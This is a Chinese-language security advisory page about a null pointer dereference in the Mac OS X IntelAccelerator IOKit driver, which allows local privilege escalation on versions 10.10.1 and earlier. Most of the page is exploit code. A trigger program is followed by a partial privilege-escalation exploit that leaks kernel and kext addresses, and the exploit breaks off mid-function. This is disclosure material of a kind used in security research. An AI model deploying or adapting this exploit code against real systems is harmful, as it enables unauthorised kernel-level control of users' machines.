Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地

发布日期:2015-01-20
更新日期:2015-01-23

受影响系统:
Apple Mac OS X
描述:
BUGTRAQ  ID: 72262

OS X(前称Mac OS X)是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。

Apple Mac OS X 10.10.1及更早版本在实现上存在内存操作不当导致的代码执行漏洞,攻击者可利用此漏洞以提升的权限执行任意代码。

<*来源:Google Security Research
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <fcntl.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>

#include <IOKit/IOKitLib.h>

int main(){
  kern_return_t err;

CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  if(!matching){
    printf("unable to create service matching dictionary\n");
    return 0;
  }

io_iterator_t iterator;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 0;
  }

io_service_t service = IOIteratorNext(iterator);

if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", service);

io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }else{
    printf("got userclient connection: %x\n", conn);
  }

mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  return 0;
 }

// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
 // ianbeer
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <unistd.h>

#include <CoreFoundation/CoreFoundation.h>
 #include <IOKit/IOKitLib.h>

uint64_t kernel_symbol(char* sym){
  char cmd[1024];
  strcpy(cmd, "nm -g /mach_kernel | grep ");
  strcat(cmd, sym);
  strcat(cmd, " | cut -d' ' -f1");
  FILE* f = popen(cmd, "r");
  char offset_str[17];
  fread(offset_str, 16, 1, f);
  pclose(f);
  offset_str[16] = '\x00';

uint64_t offset = strtoull(offset_str, NULL, 16);
  return offset;
 }

uint64_t leaked_offset_in_kext(){
  FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
  char offset_str[17];
  fread(offset_str, 16, 1, f);
  pclose(f);
  offset_str[16] = '\x00';

uint64_t offset = strtoull(offset_str, NULL, 16);
  offset += 0x10; //offset from symbol to leaked pointer
  return offset;
 }


 uint64_t leak(){
  io_iterator_t iter;
   
  CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
                                                kIOServicePlane,
                                                CFSTR("AAPL,iokit-ndrv"),
                                                kCFAllocatorDefault,
                                                kIORegistryIterateRecursively);

if (CFGetTypeID(p) != CFDataGetTypeID()){
    printf("expected CFData\n");
    return 1;
  }

if (CFDataGetLength(p) != 8){
    printf("expected 8 bytes\n");
    return 1;
  }

uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
  return leaked;
 }

extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);

uint64_t kext_load_addr(char* target_name){
  uint64_t addr = 0;
  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
  CFIndex count = CFDictionaryGetCount(kd);
   
  void **keys;
  void **values;
   
  keys = (void **)malloc(sizeof(void *) * count);
  values = (void **)malloc(sizeof(void *) * count);
   
  CFDictionaryGetKeysAndValues(kd,
                                (const void **)keys,
                                (const void **)values);

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ba407cad135a5b7ac9ebd9ad9fb8940f.html